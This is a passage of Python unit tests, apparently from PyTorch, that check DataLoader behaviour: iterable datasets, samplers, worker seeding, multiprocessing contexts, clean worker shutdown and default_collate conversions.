sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
            # worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
            # worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
    def test_sequential_batch_workers(self):
        self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
    def test_sequential_batch_workers_prefetch(self):
        self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement and without specified num_samples
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# test sample without replacement and with specified num_samples
n = len(self.dataset) * 2
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == len(self.dataset))
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
n = len(self.dataset) - 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
n = len(self.dataset) + 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 1)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_random_sampler_len_without_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=False,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples // batch_size + (num_samples % batch_size > 0),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
for sampler in (
RandomSampler(self.dataset, num_samples=5, replacement=True),
RandomSampler(self.dataset, replacement=False),
WeightedRandomSampler(weights, num_samples=5, replacement=True),
WeightedRandomSampler(weights, num_samples=5, replacement=False),
SubsetRandomSampler(range(10)),
):
torch.manual_seed(0)
l1 = list(sampler) + list(sampler)
torch.manual_seed(0)
l2 = list(sampler) + list(sampler)
self.assertEqual(l1, l2)
its = (iter(sampler), iter(sampler))
ls = ([], [])
for idx in range(len(sampler)):
for i in range(2):
if idx == 0:
torch.manual_seed(0)
ls[i].append(next(its[i]))
self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
            self._test_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy generated states as the reference to test `_generate_state`
# having the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
(r'''There might be ConnectionResetError or leaked semaphore warning '''
r'''(due to dirty process exit), but they are all safe to ignore''')
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces hold a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before process end. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal testing process
# that various things are setup, including that the worker pids
# are specified in `worker_pids` array.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in the loader process may hit a
# `ConnectionRefusedError` because it cannot open a socket to receive
# the resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_convert_mapping_keep_type(self):
data = CustomDict({"a": 1, "b": 2})
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_keep_type(self):
data = CustomList([1, 2, 3])
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, data)
def test_default_convert_sequence_dont_keep_type(self):
data = range(2)
converted = _utils.collate.default_convert(data)
self.assertEqual(converted, [0, 1])
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
def test_default_collate_mapping_keep_type(self):
batch = [CustomDict({"a": 1, "b": 2}), CustomDict({"a": 3, "b": 4})]
collated = _utils.collate.default_collate(batch)
expected = CustomDict({"a": torch.tensor([1, 3]), "b": torch.tensor([2, 4])})
self.assertEqual(collated, expected)
def test_default_collate_sequence_keep_type(self):
batch = [CustomList([1, 2, 3]), CustomList([4, 5, 6])]
collated = _utils.collate.default_collate(batch)
expected = CustomList([
torch.tensor([1, 4]),
torch.tensor([2, 5]),
torch.tensor([3, 6]),
])
self.assertEqual(collated, expected)
def test_default_collate_sequence_dont_keep_type(self):
batch = [range(2), range(2)]
collated = _utils.collate.default_collate(batch)
self.assertEqual(collated, [torch.tensor([0, 0]), torch.tensor([1, 1])])
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
